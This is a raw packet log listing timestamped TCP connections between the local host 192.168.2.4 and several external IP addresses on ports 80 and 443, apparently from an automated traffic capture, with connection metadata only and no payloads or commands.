Mar 28, 2024 09:14:58.997756004 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997785091 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997792959 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997805119 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997828007 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.005784988 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.005809069 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.005840063 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.005870104 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.012192011 CET	443	49761	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:59.012258053 CET	49761	443	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:59.012366056 CET	443	49760	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:59.012459993 CET	49760	443	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:59.015644073 CET	49761	443	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:59.015650988 CET	443	49761	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:59.015885115 CET	443	49761	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:59.015894890 CET	49760	443	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:59.015918016 CET	443	49760	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:59.015927076 CET	49761	443	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:59.016176939 CET	443	49760	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:59.016262054 CET	49760	443	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:59.016330004 CET	49761	443	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:59.016541958 CET	49760	443	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:59.018512964 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018542051 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018554926 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018567085 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018569946 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.018579006 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018591881 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018637896 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.018637896 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.018662930 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018733978 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.018907070 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018920898 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018937111 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018951893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.018961906 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.018992901 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.019005060 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.019006968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.019006968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.019016027 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.019068003 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.019068003 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.019632101 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.019650936 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.019687891 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.019711971 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.019861937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.019875050 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.019941092 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.019953966 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.019953966 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.019953966 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.019984007 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.020004034 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.020004988 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.020039082 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.020072937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.020081043 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.020081043 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.020529032 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.020739079 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.020792007 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.020798922 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.020828962 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.020834923 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.020834923 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.020842075 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.020878077 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.020899057 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.020916939 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.020916939 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.020960093 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.021714926 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.021730900 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.021765947 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.021785021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.021797895 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.021817923 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.021817923 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.021842957 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.021855116 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.021878004 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.021878004 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.021913052 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.021948099 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.021948099 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.022669077 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.022686958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.022720098 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.022722960 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.022737026 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.022767067 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.022767067 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.022794962 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.022818089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.022830009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.022834063 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.022834063 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.022870064 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.022870064 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.023607969 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.023623943 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.023658037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.023668051 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.023670912 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.023688078 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.023739100 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.033512115 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.033543110 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.033575058 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.033600092 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.047367096 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.047395945 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.047434092 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.047457933 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.052500963 CET	80	49751	176.113.115.135	192.168.2.4
Mar 28, 2024 09:14:59.052546978 CET	80	49751	176.113.115.135	192.168.2.4
Mar 28, 2024 09:14:59.052587986 CET	49751	80	192.168.2.4	176.113.115.135
Mar 28, 2024 09:14:59.052647114 CET	49751	80	192.168.2.4	176.113.115.135
Mar 28, 2024 09:14:59.058629036 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.058650970 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.058686018 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.058712006 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.059205055 CET	80	49750	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.059216976 CET	80	49750	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.059228897 CET	80	49750	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.059283018 CET	49750	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.059572935 CET	49750	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.059925079 CET	49762	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.061095953 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.061142921 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.061148882 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.061180115 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.064227104 CET	443	49761	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:59.064233065 CET	443	49760	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:59.067341089 CET	443	49759	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:59.067410946 CET	49759	443	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:59.070596933 CET	49759	443	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:59.070606947 CET	443	49759	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:59.070907116 CET	443	49759	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:59.070956945 CET	49759	443	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:59.071356058 CET	49759	443	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:59.073256969 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.073282003 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.073323965 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.073359966 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.075009108 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.075023890 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.075067043 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.075087070 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.088058949 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.088099003 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.088116884 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.088136911 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.092185974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092215061 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092235088 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092240095 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092297077 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.092297077 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.092300892 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092314005 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092360973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.092360973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.092521906 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092536926 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092549086 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092571020 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.092571020 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.092818975 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092833996 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092853069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.092866898 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092873096 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.092883110 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.092883110 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.092957973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.093233109 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.093286037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.093302011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.093333960 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.093346119 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.093368053 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.093368053 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.093383074 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.093436956 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.093436956 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.093897104 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.093913078 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.093926907 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.093969107 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.093974113 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.093974113 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.093981028 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.094032049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.094032049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.094456911 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.094471931 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.094491005 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.094500065 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.094502926 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.094530106 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.094568968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.094573975 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.094585896 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.094598055 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.094630957 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.094630957 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.095381975 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.095402956 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.095436096 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.095448971 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.095449924 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.095470905 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.095484018 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.095520020 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.095520020 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.095525980 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.095802069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.096369028 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.096400023 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.096438885 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.096438885 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.096477032 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.096489906 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.096501112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.096509933 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.096544981 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.096544981 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.096860886 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.096877098 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.096915960 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.096929073 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.096971989 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.096971989 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.096992016 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.097003937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.097014904 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.097073078 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.097810984 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.097826004 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.097846985 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.097898960 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.097904921 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.097910881 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.097929955 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.097929955 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.097965956 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.097980022 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.098001003 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.098001003 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.098059893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.098768950 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.098787069 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.098799944 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.098813057 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.098819017 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.098871946 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.098871946 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.098881006 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.098908901 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.098921061 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.098942995 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.098942995 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.099201918 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.099684954 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.099723101 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.099730968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.099735022 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.099785089 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.099785089 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.099785089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.099793911 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.099798918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.099837065 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.099873066 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.099873066 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.100579977 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.100594997 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.100622892 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.100642920 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.100645065 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.100645065 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.100670099 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.100692034 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.100692034 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.100702047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.100713015 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.100735903 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.100735903 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.100788116 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.101479053 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.101521015 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.101525068 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.101533890 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.101567984 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.101579905 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.101579905 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.101579905 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.101607084 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.101627111 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.101627111 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.101629019 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.101665974 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.101665974 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.102405071 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.102437973 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.102451086 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.102469921 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.102469921 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.102488041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.102497101 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.102519989 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.102524042 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.102555990 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.102566957 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.102579117 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.102581978 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.102592945 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.102617025 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.102638960 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.103384972 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.103398085 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.103414059 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.103425026 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.103487015 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.103519917 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.103521109 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.107595921 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107610941 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107621908 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107634068 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107652903 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107678890 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.107691050 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.107702017 CET	80	49737	185.172.128.6	192.168.2.4
